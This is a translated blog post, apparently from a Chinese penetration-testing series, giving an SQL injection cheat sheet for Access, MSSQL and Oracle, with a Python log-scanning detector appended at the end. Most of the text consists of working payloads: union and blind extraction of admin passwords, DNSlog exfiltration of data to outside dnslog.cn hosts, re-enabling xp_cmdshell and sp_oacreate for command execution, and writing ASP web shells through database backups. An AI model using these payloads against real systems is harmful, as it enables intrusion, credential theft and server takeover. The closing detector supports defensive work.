Access is a lightweight database. It has no separate databases and no users, and a single file holds all the data, so during SQL injection you must guess table and column names.
Access supports only union injection and boolean blind injection.
1, Union injection
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 22
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
2, Boolean blind injection
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97
3, How to query the value in the second row
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where id=40
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where admin not in ('admin')
id=1513 union select 1,2,(select top 1 password from (select top 2 * from admin order by 1 desc)),4,5,6,7,8,9,10,11,12,13,14, (select top 1 admin from (select top 2 * from admin order by 1 desc)),16,17,18,19,20,21,22 from admin
4, Some special approaches to guessing column names in Access
Enumerating columns with having
select id,admin,password from admin where id=1 group by 1 having 1=1
select id,admin,password from admin where id=1 group by 1,id having 1=1
select id,admin,password from admin where id=1 group by 1,id,admin having 1=1
select * from admin where id=1 having sum(1)=1
Offset injection: you need to guess one column name, usually id
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10, * from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)
Shift-overflow injection
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,admin.*,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.*,19,20,21,22 from admin
Combining the two techniques requires the total column count to exceed 1/4 of the admin table's column count; the case above does not satisfy that condition
select 1,2,3,4,5,6,a.*,* from (admin as a inner join admin as b on a.id=b.id)
5, Some tips
Access whitespace characters: %20, %09, %0A, %0C, %0D
There are no comments, but there are characters that act as comment terminators: %16, %00
select(password)from(admin)
select[password]from[admin]
select`password`from`admin`
IIS peculiarities
A stray % is tolerated, e.g. uni%on select
Unicode encoding is accepted, e.g. %u0075%u006eion select
This is similar to the JSON format {"id":"\u0031"}
Duplicate parameters are joined with a comma: id=1&id=2 becomes id=1,2, which can be used in union injection
MySQL, by contrast, allows id=1 and/*&id=*/1=1
Direct export, or backup, to get a shell
select * into [a] in 'E:\1.asp;.xls' 'excel 4.0;' from admin
If the database file (.mdb) is parsed by the server, inserting 【┼攠數畣整爠煥敵瑳∨≡┩愾】 into any value is parsed as <%eval request ("a")%>
Injection without select
id = 39 and asc(mid(dfirst("password","admin"),1,1))=97
select dfirst(1,"admin")
select dfirst("password","admin")
select dfirst("[password]","[admin]","id=40")
select dlast("[password]","[admin]")
dlookup, dmin, dmax and dcount are also available
The others, davg, dsum, DStDev, DStDevP, DVar and DVarP, only work on numeric types
Other string comparisons
id = 39 and instr(dfirst("[password]","[admin]","id=40"),'a')
id = 39 and instr(dfirst("[password]","[admin]","id=40"),'a48e190fafc')
MSSQL
1, Union injection
http://127.0.0.1/1.aspx?id=1 order by 4
http://127.0.0.1/1.aspx?id=-1 union select 1,2,3,4
http://127.0.0.1/1.aspx?id=-1 union all select null,null,null,null
http://127.0.0.1/1.aspx?id=-1 union all select null,db_name(),null,null
Enumerating databases; the first six are system databases
(select name from master.dbo.sysdatabases where dbid=7)
Query the first table in the specified database test
(select top 1 name from test.dbo.sysobjects where xtype='U')
Query the first table in the current database
(select top 1 name from sysobjects where xtype='U')
Query the second table in the current database
(select top 1 name from sysobjects where xtype='U' and name not in ('admin'))
Query all tables in the current database
(select name from sysobjects where xtype='U' FOR XML PATH(''))
Query columns
(select top 1 name from syscolumns where id=object_id('admin'))
Query all columns separated by |
(select '|'%2bname%2b'|' from syscolumns where id=object_id('admin') FOR XML PATH(''))
Vary the 0 to step through the columns quickly
(select top 1 name from syscolumns where id=object_id('admin') and name not in (select top 0 name from syscolumns where id=object_id('admin')))
Query all values
(select password+username from admin FOR XML PATH(''))
MySQL-style lookup of tables and columns
(select top 1 table_name from information_schema.tables)
(select top 1 column_name from information_schema.columns where table_name='admin')
Note: if a subquery cannot be used directly, it may need to be wrapped in exists()
2, Error-based injection
Error-based injection is very easy in MSSQL: just compare a string with a number
http://127.0.0.1/1.aspx?id=@@version
http://127.0.0.1/1.aspx?id=1 and @@version=1
http://127.0.0.1/1.aspx?id=1 and 1=convert(int,@@version)
http://127.0.0.1/1.aspx?id=1 and 1=cast(@@version as int)
http://127.0.0.1/1.aspx?id=1%2bUSER_NAME(@@version)
Note: USER_NAME() can be replaced by SUSER_NAME(), PERMISSIONS(), DB_NAME(), FILE_NAME(), TYPE_NAME() or COL_NAME()
3, Blind injection
Boolean blind injection
http://127.0.0.1/1.aspx?id=1 and ascii(substring((select user),1,1))=100
Time-based blind injection
select * from admin where id = 1 if 1=2 WAITFOR DELAY '0:0:5'
http://127.0.0.1/1.aspx?id=1;if(ascii(substring((select user),1,1)))=100 WAITFOR DELAY '0:0:5'
DNSlog injection requires stacked queries and sa privileges
The principle is to use xp_subdirs, xp_dirtree or xp_fileexist to access an SMB share whose hostname carries the data, which triggers a DNS lookup. OpenRowset() and OpenDatasource() can also be used; these two functions load remote MSSQL databases and are disabled by default.
declare @host varchar(1024);
select @host=convert(varchar(1024),db_name())+'.vj0r9q.dnslog.cn';
exec('master..xp_subdirs "\\'+@host+'"');
or
exec('master..xp_dirtree "\\'+@host+'"');
exec('master..xp_fileexist "\\'+@host+'\test"');
DNSlog is also possible without stacked queries
and exists(select * from fn_xe_file_target_read_file('C:\Windows\win.ini','\\'+(select user)+'.a72ita.dnslog.cn\1.xem',null,null))
and exists(select * from fn_get_audit_file('\\'+(select user)+'.a72ita.dnslog.cn\1.xem',null,null))
and exists(select * from fn_trace_gettable('\\'+(select user)+'.xrjff0.dnslog.cn\1.trc',null))
4, Stacked injection
MSSQL supports stacked queries by default, so any injection point amounts to a direct database connection: you can insert, delete, update and select freely, and with sa privileges the extended procedures allow further exploitation.
With stacked queries, declare and exec also allow injection without select
declare @s varchar(2000) set @s=0x73656C6563742031 exec(@s)
5, Using extended procedures under stacked injection
xp_cmdshell: command execution; disabled by default in newer versions, but it can be re-enabled
Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
Exec master.dbo.xp_cmdshell 'whoami';
Without stacked queries
id=1 if 1=1 execute('exec sp_configure ''show advanced options'',1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell''whoami''');
openrowset: disabled by default since 2005
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''calc''')
select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)
sp_OACreate (also written sp_oacreate): command execution and file operations, with no output returned
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >D:\1.txt'
DECLARE @Result int;DECLARE @FSO_Token int;EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT;EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'D:\1.txt';EXEC @Result = sp_OADestroy @FSO_Token;
declare @aa int;exec sp_oacreate 'scripting.filesystemobject', @aa out;exec sp_oamethod @aa, 'moveFile',null,'D:\1.txt', 'D:\2.txt';
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out;exec sp_oamethod @o, 'copyfile',null,'D:\1.txt' ,'D:\2.txt';
declare @o int;exec sp_oacreate 'Shell.Application', @o out;exec sp_oamethod @o, 'ShellExecute',null,'C:\windows\system32\calc.exe';
Running commands through an Agent Job
USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'c:\windows\system32\cmd.exe /c whoami >c:\1.txt', @retry_attempts = 1, @retry_interval = 5 ;
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';
CLR assemblies
Using CLR assemblies in MSSQL to execute commands - 先知社区
Sandbox command execution (possibly only on older versions)
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
sp_makewebtask (older versions only)
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;
exec sp_makewebtask 'D:\1.asp','select''<%execute(request("a"))%>'' ';
xp_dirtree and xp_subdirs list files; xp_fileexist checks whether a file exists
execute master..xp_dirtree 'c:\',1,1
execute master..xp_subdirs 'c:\'
execute master..xp_fileexist 'D:\test.txt'
xp_regenumvalues, xp_regread, xp_regwrite, xp_regdeletevalue, xp_regdeletekey: registry operations.
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
EXEC master..xp_regenumvalues 'HKEY_CURRENT_USER','Control Panel\International','sCountry';
sp_helpextendedproc: list all extended procedures
EXEC master..sp_helpextendedproc
xp_availablemedia: list drives
exec master..xp_availablemedia
xp_logininfo, xp_enumgroups: list the machine's users and groups
exec xp_logininfo
sp_who2: list logged-in accounts
EXEC master..sp_who2
sp_addlinkedserver and sp_addlinkedsrvlogin
Can log in to other MSSQL and Oracle servers
6, File read and write
File reading with BULK INSERT
create table #testtable(context ntext);BULK INSERT #testtable FROM 'D:/test.txt' WITH (DATAFILETYPE = 'char',KEEPNULLS);select * from #testtable;drop table #testtable;
Database backup
create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute/**/(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='E:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];
Log backup
create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute/**/(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];
7, Some tips
Built-in MSSQL functions
@@version system_user suser_sname() user db_name() host_name()
MSSQL whitespace
%01-%20 are all whitespace; -- and /**/ are comments, and %00 can also act as a comment terminator
Other approaches
id=0xunion selectNnull,null,null,null from.admin
Avoiding quotes
(select top 1 name from syscolumns where id=object_id('admin'))
(select top 1 name from syscolumns where id=object_id(char(97)+char(100)+char(109)+char(105)+char(110)))
Dumping the complete current statement
id=1 union select null,(select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)),null,null
Oracle
1, Union injection
null must be used, and select must be given a dummy table: from dual
http://127.0.0.1:81/oracle.php?id=1 order by 3
http://127.0.0.1:81/oracle.php?id=-1 union select null,(select user from dual),null from dual
Current database name
select name from v$database
IP address, IPv6
select utl_inaddr.get_host_address from dual
User privileges
select privilege from session_privs where rownum=1
Enumerate schemas
select owner from all_tables where rownum=1
Enumerate other schemas
select owner from all_tables where rownum=1 and owner <>'SYS'
Query the first table
select table_name from user_tables where rownum=1
Quickly query the second table
select table_name from (select rownum r, table_name from user_tables order by table_name) WHERE r=2
Query the first column
select column_name from user_tab_columns where rownum=1 and table_name='admin'
Query the first value
select concat(username,password) from admin where rownum=1
select username||password from admin where rownum=1
2, Error-based injection
Error-based injection in Oracle is also simple: compare the result with 1, or test it with is not null
and 1=utl_inaddr.get_host_name((select user from dual))
and 1=ctxsys.drithsx.sn(1,(select user from dual))
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null
and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null
3, Blind injection
Boolean blind injection; decode works like if
and 6=length(user)
and 83=(select ascii(substr((select user from dual),1,1)) from dual)
and 1=(select decode(substr((select user from dual),1,1),chr(83),1,0) from dual)
Time-based blind injection
and 1=(select decode(substr((select user from dual),1,1),chr(83),DBMS_PIPE.RECEIVE_MESSAGE(CHR(78),2),0) from dual)
and 1=(select decode(substr((select user from dual),1,1),chr(83),(select count(*) from all_objects),0) from dual)
(select count(*) from all_objects) is an expensive operation, similar to a Cartesian product; if the delay is not noticeable, (select count(*) from all_objects)||(select count(*) from all_objects) doubles the time
DNSlog blind injection
and utl_http.request('http://'||(select user from dual)||'.0n7kdm.dnslog.cn/')=1
and UTL_INADDR.GET_HOST_ADDRESS((select user from dual)||'.7vkm67.dnslog.cn')=1
4, Oracle tips
Oracle whitespace characters: %00 %0A %0D %0C %09 %20
Comments: /**/ and -- are supported as well
Avoiding quotes
and user='SYSTEM'
and user=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)
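As an added example from the defender's side (not part of the original post), the following Python normaliser undoes the encoding tricks listed in the Access/IIS, MSSQL and Oracle tips sections (%01-%20 whitespace, /**/ and -- comments, IIS %uXXXX escapes, a stray % inside a keyword, comma-joined duplicate parameters) before matching logged request URLs against the payload families covered above. The signature names, the helper names and the sample request lines are my own constructions modelled on the payloads in this post.

```python
import re
from urllib.parse import unquote, urlsplit

WS = re.compile(r"[\x00-\x20]+")                # %01-%20 all act as whitespace for MSSQL
COMMENT = re.compile(r"/\*.*?\*/|--.*")         # /**/ and -- used as separators
UNI = re.compile(r"%u([0-9a-fA-F]{4})")         # IIS %uXXXX escapes
STRAY_PCT = re.compile(r"%(?![0-9a-fA-F]{2})")  # IIS tolerates a lone % inside a keyword
SIGNATURES = {  # derived from the payload families shown in this post; detection only
    "union": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "access-blind": re.compile(r"\bexists\s*\(\s*select|\bdfirst\s*\(|\basc\s*\(\s*mid\s*\("),
    "mssql-error": re.compile(r"@@version|\bconvert\s*\(\s*int\b|\bcast\s*\(.*\bas\s+int\b"),
    "mssql-stacked": re.compile(r";\s*(if|declare|exec(ute)?)\b|\bxp_\w+|\bsp_oa\w+|\bopenrowset\b"),
    "mssql-time": re.compile(r"\bwaitfor\s+delay\b"),
    "oracle": re.compile(r"utl_inaddr|utl_http|dbms_pipe\.receive_message|ctxsys\.drithsx|\bfrom\s+dual\b"),
}

def iis_params(query: str) -> dict:
    """Classic ASP joins repeated parameters with a comma: id=1&id=2 -> '1,2'."""
    params = {}
    for key, _, val in (p.partition("=") for p in query.split("&")):
        params.setdefault(key, []).append(unquote(val))
    return {k: ",".join(v) for k, v in params.items()}

def normalize(value: str) -> str:
    """Undo the encoding tricks from the tips sections so the signatures can match."""
    s = UNI.sub(lambda m: chr(int(m.group(1), 16)), value)
    s = COMMENT.sub(" ", STRAY_PCT.sub("", s))
    return WS.sub(" ", s).lower()

def classify(url: str) -> list:
    """Signature names matched by any parameter of one logged request URL."""
    hits = set()
    for raw in iis_params(urlsplit(url).query).values():
        text = normalize(raw)
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(text))
    return sorted(hits)

# Constructed sample request lines modelled on the payloads above (not real traffic)
SAMPLE_LOG = [
    "/Production/PRODUCT_DETAIL.asp?id=1513%20uni%on%09select%201,2,password,4%20from%20admin",
    "/Production/PRODUCT_DETAIL.asp?id=1513&id=%u0075%u006eion%20select%201,2,3",
    "/Production/PRODUCT_DETAIL.asp?id=1513%20and%20exists%20(select%20*%20from%20admin)",
    "/1.aspx?id=1;if(ascii(substring((select%20user),1,1)))=100%20WAITFOR%20DELAY%20'0:0:5'",
    "/1.aspx?id=1/**/and/**/1=convert(int,@@version)",
    "/oracle.php?id=1%20and%201=utl_inaddr.get_host_name((select%20user%20from%20dual))",
    "/Production/PRODUCT_DETAIL.asp?id=151",
]
def scan(lines=SAMPLE_LOG) -> dict:
    """Map each suspicious URL to its matched signatures; clean requests are omitted."""
    return {url: tags for url in lines if (tags := classify(url))}
```

Because matching happens after normalisation, the %09 whitespace, %u-encoded union, stray % and comment-separated variants all collapse onto the same signatures as their plain forms.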
Previous part: 珂字辈: SQL injection, chapter one, MySQL
If you found this useful, follow the WeChat public account 珂技知识分享, where some penetration-testing case studies are published.